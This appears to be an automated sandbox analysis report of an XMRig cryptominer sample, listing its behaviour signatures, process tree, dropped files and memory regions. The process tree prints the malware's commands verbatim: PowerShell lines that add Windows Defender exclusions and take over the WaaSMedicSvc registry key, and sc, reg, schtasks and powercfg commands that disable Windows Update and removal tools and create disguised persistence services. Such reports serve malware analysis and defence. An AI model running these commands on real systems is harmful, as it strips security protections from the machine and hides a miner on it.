Analysis

  • max time kernel
    149s
  • max time network
    149s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20260513-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20260513-enlocale:en-usos:windows10-2004-x64systemwindows
  • submitted
    04/08/2026, 04:45

General

  • Target
    file.exe
  • Size 5.0MB
  • Sample260804-fdpf9sv1d1
  • SHA256 eed6fe7c2b6252644f6617c45721dca2b412cdec28a4f3687fc753f099add67b
  • MD5 SHA1 SHA512 SSDEEP TLSH

Malware Config

Signatures

  • Family: xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Modifies security service 2 TTPs 5 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
  • XMRig Miner payload 12 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Server Software Component: Terminal Services DLL 1 TTPs 4 IoCs
  • Sets service image path in registry 3 TTPs 5 IoCs

    This determines the executable launched when a service starts. It can be used to establish persistence.

  • Creates new service(s) 2 TTPs
  • Cryptocurrency Miner

    Makes network request to known mining pool URL.

  • Deletes itself 1 IoCs
  • Disables service(s) 3 TTPs
  • Executes dropped EXE 1 IoCs
  • Stops running service(s) 4 TTPs
  • Power Settings 1 TTPs 4 IoCs

    powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of SetThreadContext 2 IoCs
  • Launches sc.exe 17 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Modifies data under HKEY_USERS 64 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 13 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 49 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
      PID:3268
      • C:\Users\Admin\AppData\Local\Temp\file.exe
        "C:\Users\Admin\AppData\Local\Temp\file.exe"
        2⤵
        • Deletes itself
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious behavior: RenamesItself
        • Suspicious use of WriteProcessMemory
        PID:1768
        • C:\Windows\System32\sc.exe
          "C:\Windows\System32\sc.exe" delete "MicrosoftEdgeUpdateTaskMachine_3aa5"
          3⤵
          • Launches sc.exe
          PID:2640
        • C:\Windows\System32\sc.exe
          "C:\Windows\System32\sc.exe" create "MicrosoftEdgeUpdateTaskMachine_3aa5" binpath= "C:\ProgramData\Microsoft\Network\Diagnostics\73BF5F50\LockAppHost14a02b.exe" start= "auto"
          3⤵
          • Launches sc.exe
          PID:3232
        • C:\Windows\System32\sc.exe
          "C:\Windows\System32\sc.exe" start "MicrosoftEdgeUpdateTaskMachine_3aa5"
          3⤵
          • Launches sc.exe
          PID:4940
      • C:\Windows\System32\nslookup.exe
        "C:\Windows\System32\nslookup.exe"
        2⤵
        • Suspicious use of NtCreateUserProcessOtherParentProcess
        • Drops file in System32 directory
        • Suspicious use of SetThreadContext
        • Modifies data under HKEY_USERS
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3608
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData, $env:TEMP) -ExclusionExtension @('.exe', '.sys') -Force
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3512
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $key='HKLM:\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc';$acl=Get-Acl $key;$admin=New-Object System.Security.Principal.NTAccount('BUILTIN','Administrators');$acl.SetOwner($admin);$rule=New-Object System.Security.AccessControl.RegistryAccessRule($admin,'FullControl','Allow');$acl.SetAccessRule($rule);Set-Acl $key $acl;Set-ItemProperty $key -Name 'Start' -Value 4 -Type DWord
          3⤵
          • Command and Scripting Interpreter: PowerShell
          • Drops file in System32 directory
          • Modifies data under HKEY_USERS
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1952
        • C:\Windows\System32\sc.exe
          "C:\Windows\System32\sc.exe" config WaaSMedicSvc start= disabled
          3⤵
          • Launches sc.exe
          PID:1092
        • C:\Windows\System32\sc.exe
          "C:\Windows\System32\sc.exe" stop WaaSMedicSvc
          3⤵
          • Launches sc.exe
          PID:988
        • C:\Windows\System32\sc.exe
          "C:\Windows\System32\sc.exe" config UsoSvc start= disabled
          3⤵
          • Launches sc.exe
          PID:3068
        • C:\Windows\System32\sc.exe
          "C:\Windows\System32\sc.exe" stop UsoSvc
          3⤵
          • Launches sc.exe
          PID:4312
        • C:\Windows\System32\reg.exe
          "C:\Windows\System32\reg.exe" copy "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" "HKLM\SYSTEM\CurrentControlSet\Services\ejlrpkvoys" /s /f
          3⤵
          • Server Software Component: Terminal Services DLL
          • Sets service image path in registry
          PID:3348
        • C:\Windows\System32\reg.exe
          "C:\Windows\System32\reg.exe" delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
          3⤵
            PID:2064
          • C:\Windows\System32\sc.exe
            "C:\Windows\System32\sc.exe" config WaaSMedicSvc start= disabled
            3⤵
            • Launches sc.exe
            PID:1572
          • C:\Windows\System32\sc.exe
            "C:\Windows\System32\sc.exe" stop WaaSMedicSvc
            3⤵
            • Launches sc.exe
            PID:2784
          • C:\Windows\System32\reg.exe
            "C:\Windows\System32\reg.exe" copy "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" "HKLM\SYSTEM\CurrentControlSet\Services\lkukojwsue" /s /f
            3⤵
            • Server Software Component: Terminal Services DLL
            • Sets service image path in registry
            PID:220
          • C:\Windows\System32\reg.exe
            "C:\Windows\System32\reg.exe" delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
            3⤵
              PID:4424
            • C:\Windows\System32\sc.exe
              "C:\Windows\System32\sc.exe" config wuauserv start= disabled
              3⤵
              • Launches sc.exe
              PID:544
            • C:\Windows\System32\sc.exe
              "C:\Windows\System32\sc.exe" stop wuauserv
              3⤵
              • Launches sc.exe
              PID:1012
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" copy "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" "HKLM\SYSTEM\CurrentControlSet\Services\ugqgdzbdkn" /s /f
              3⤵
              • Server Software Component: Terminal Services DLL
              • Sets service image path in registry
              PID:2384
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
              3⤵
              • Modifies security service
              PID:4512
            • C:\Windows\System32\sc.exe
              "C:\Windows\System32\sc.exe" config BITS start= disabled
              3⤵
              • Launches sc.exe
              PID:4036
            • C:\Windows\System32\sc.exe
              "C:\Windows\System32\sc.exe" stop BITS
              3⤵
              • Launches sc.exe
              PID:2168
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" copy "HKLM\SYSTEM\CurrentControlSet\Services\BITS" "HKLM\SYSTEM\CurrentControlSet\Services\rpanthbcnp" /s /f
              3⤵
              • Server Software Component: Terminal Services DLL
              • Sets service image path in registry
              PID:2512
            • C:\Windows\System32\reg.exe
              "C:\Windows\System32\reg.exe" delete "HKLM\SYSTEM\CurrentControlSet\Services\BITS" /f
              3⤵
                PID:4924
              • C:\Windows\System32\sc.exe
                "C:\Windows\System32\sc.exe" config dosvc start= disabled
                3⤵
                • Launches sc.exe
                PID:2004
              • C:\Windows\System32\sc.exe
                "C:\Windows\System32\sc.exe" stop dosvc
                3⤵
                • Launches sc.exe
                PID:3704
              • C:\Windows\System32\reg.exe
                "C:\Windows\System32\reg.exe" copy "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" "HKLM\SYSTEM\CurrentControlSet\Services\ezxsorftik" /s /f
                3⤵
                • Sets service image path in registry
                PID:2732
              • C:\Windows\System32\reg.exe
                "C:\Windows\System32\reg.exe" delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
                3⤵
                  PID:3876
                • C:\Windows\System32\schtasks.exe
                  "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /Disable
                  3⤵
                    PID:3768
                  • C:\Windows\System32\schtasks.exe
                    "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /Disable
                    3⤵
                      PID:2080
                    • C:\Windows\System32\schtasks.exe
                      "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /Disable
                      3⤵
                        PID:1408
                      • C:\Windows\System32\schtasks.exe
                        "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\UpdateOrchestrator\Schedule Scan" /Disable
                        3⤵
                          PID:4760
                        • C:\Windows\System32\schtasks.exe
                          "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\UpdateOrchestrator\Schedule Scan Static Task" /Disable
                          3⤵
                            PID:796
                          • C:\Windows\System32\schtasks.exe
                            "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\UpdateOrchestrator\Schedule Work" /Disable
                            3⤵
                              PID:3324
                            • C:\Windows\System32\schtasks.exe
                              "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work" /Disable
                              3⤵
                                PID:3496
                              • C:\Windows\System32\schtasks.exe
                                "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\UpdateOrchestrator\USO_UxBroker" /Disable
                                3⤵
                                  PID:4332
                                • C:\Windows\System32\schtasks.exe
                                  "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\UpdateOrchestrator\Reboot_AC" /Disable
                                  3⤵
                                    PID:3120
                                  • C:\Windows\System32\schtasks.exe
                                    "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\UpdateOrchestrator\Reboot_Battery" /Disable
                                    3⤵
                                      PID:3740
                                    • C:\Windows\System32\schtasks.exe
                                      "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\WaaSMedic\PerformRemediation" /Disable
                                      3⤵
                                        PID:3344
                                      • C:\Windows\System32\powercfg.exe
                                        "C:\Windows\System32\powercfg.exe" /x -hibernate-timeout-ac 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4652
                                      • C:\Windows\System32\powercfg.exe
                                        "C:\Windows\System32\powercfg.exe" /x -hibernate-timeout-dc 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1812
                                      • C:\Windows\System32\powercfg.exe
                                        "C:\Windows\System32\powercfg.exe" /x -standby-timeout-ac 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:2572
                                      • C:\Windows\System32\powercfg.exe
                                        "C:\Windows\System32\powercfg.exe" /x -standby-timeout-dc 0
                                        3⤵
                                        • Power Settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4768
                                      • C:\Windows\System32\schtasks.exe
                                        "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows\MRT\MRT_HB" /Disable
                                        3⤵
                                          PID:4876
                                        • C:\Windows\System32\schtasks.exe
                                          "C:\Windows\System32\schtasks.exe" /Change /TN "\Microsoft\Windows Removal Tools\MRT_HB" /Disable
                                          3⤵
                                            PID:4792
                                          • C:\Windows\System32\sc.exe
                                            "C:\Windows\System32\sc.exe" delete "RasConnectionManager_9d4d"
                                            3⤵
                                            • Launches sc.exe
                                            PID:1888
                                          • C:\Windows\System32\sc.exe
                                            "C:\Windows\System32\sc.exe" create "RasConnectionManager_9d4d" binpath= "C:\ProgramDataMicrosoftWindowsSchCache\NetworkListService22e8.exe" start= "auto"
                                            3⤵
                                            • Launches sc.exe
                                            PID:1632
                                        • C:\Windows\System32\svchost.exe
                                          "C:\Windows\System32\svchost.exe"
                                          2⤵
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of FindShellTrayWindow
                                          PID:2768
                                      • C:\ProgramData\Microsoft\Network\Diagnostics\73BF5F50\LockAppHost14a02b.exe
                                        C:\ProgramData\Microsoft\Network\Diagnostics\73BF5F50\LockAppHost14a02b.exe
                                        1⤵
                                        • Suspicious use of NtCreateUserProcessOtherParentProcess
                                        • Executes dropped EXE
                                        • Suspicious use of SetThreadContext
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        • Suspicious use of WriteProcessMemory
                                        PID:3724

                                      Network

                                            MITRE ATT&CK Enterprise v16

                                            Replay Monitor

                                            Loading Replay Monitor...

                                            Downloads

                                            LockAppHost14a02b.exe

                                            • Path C:\ProgramData\Microsoft\Network\Diagnostics\73BF5F50\LockAppHost14a02b.exe
                                            • Size 5.0MB
                                            • SHA256 eed6fe7c2b6252644f6617c45721dca2b412cdec28a4f3687fc753f099add67b
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            __PSScriptPolicyTest_5lccci5y.hnp.ps1

                                            • Path C:\Windows\Temp\__PSScriptPolicyTest_5lccci5y.hnp.ps1
                                            • Size 60B
                                            • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                            • MD5 SHA1 SHA512 TLSH

                                            powershell.exe.log

                                            • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                            • Size 4KB
                                            • SHA256 e3274ce8296f2cd20e3189576fbadbfa0f1817cdf313487945c80e968589a495
                                            • MD5 SHA1 SHA512 SSDEEP TLSH

                                            StartupProfileData-NonInteractive

                                            • Path C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                            • Size 1KB
                                            • SHA256 c5d3b1b166bd89639fb4caa37de6a3a48bcafe0a5cbff2bde11e116fcfe9dd5e
                                            • MD5 SHA1 SHA512 TLSH

                                            memory/1768-1-0x0000000140000000-0x00000001408EA000-memory.dmp

                                            memory/1768-3-0x0000000140000000-0x00000001408EA000-memory.dmp

                                            memory/1768-6-0x0000000140000000-0x00000001408EA000-memory.dmp

                                            memory/1768-7-0x00000000001E0000-0x00000000001E1000-memory.dmp

                                            memory/1768-2-0x00007FFE69650000-0x00007FFE69652000-memory.dmp

                                            memory/1768-11-0x0000000140239000-0x00000001403EA000-memory.dmp

                                            memory/1768-10-0x0000000140000000-0x00000001408EA000-memory.dmp

                                            memory/1768-0-0x0000000140239000-0x00000001403EA000-memory.dmp

                                            memory/2768-98-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/2768-94-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/2768-103-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/2768-93-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/2768-97-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/2768-95-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/2768-104-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/2768-102-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/2768-96-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/2768-89-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/2768-91-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/2768-92-0x000001D415DC0000-0x000001D415DE0000-memory.dmp

                                            memory/2768-105-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/2768-90-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/2768-84-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/2768-106-0x0000000140000000-0x000000014080D000-memory.dmp

                                            memory/3512-50-0x0000022C7AB80000-0x0000022C7AB8A000-memory.dmp

                                            memory/3512-46-0x0000022C7A950000-0x0000022C7A96C000-memory.dmp

                                            memory/3512-54-0x0000022C7ABD0000-0x0000022C7ABDA000-memory.dmp

                                            memory/3512-53-0x0000022C7ABC0000-0x0000022C7ABC6000-memory.dmp

                                            memory/3512-52-0x0000022C7AB90000-0x0000022C7AB98000-memory.dmp

                                            memory/3512-51-0x0000022C7ABE0000-0x0000022C7ABFA000-memory.dmp

                                            memory/3512-49-0x0000022C7ABA0000-0x0000022C7ABBC000-memory.dmp

                                            memory/3512-48-0x0000022C7AA30000-0x0000022C7AA3A000-memory.dmp

                                            memory/3512-47-0x0000022C7A970000-0x0000022C7AA25000-memory.dmp

                                            memory/3512-55-0x0000022C78590000-0x0000022C785A0000-memory.dmp

                                            memory/3512-38-0x00007FF4E7F50000-0x00007FF4E7F60000-memory.dmp

                                            memory/3512-30-0x0000022C78520000-0x0000022C78542000-memory.dmp

                                            memory/3512-28-0x0000022C78590000-0x0000022C785A0000-memory.dmp

                                            memory/3512-29-0x0000022C78590000-0x0000022C785A0000-memory.dmp

                                            memory/3608-25-0x00000284DFA80000-0x00000284DFA81000-memory.dmp

                                            memory/3608-21-0x0000000140000000-0x0000000140231000-memory.dmp

                                            memory/3724-27-0x0000000140000000-0x00000001408EA000-memory.dmp

                                            memory/3724-26-0x0000000140000000-0x00000001408EA000-memory.dmp

                                            memory/3724-16-0x0000000140000000-0x00000001408EA000-memory.dmp

                                            memory/3724-17-0x0000000140000000-0x00000001408EA000-memory.dmp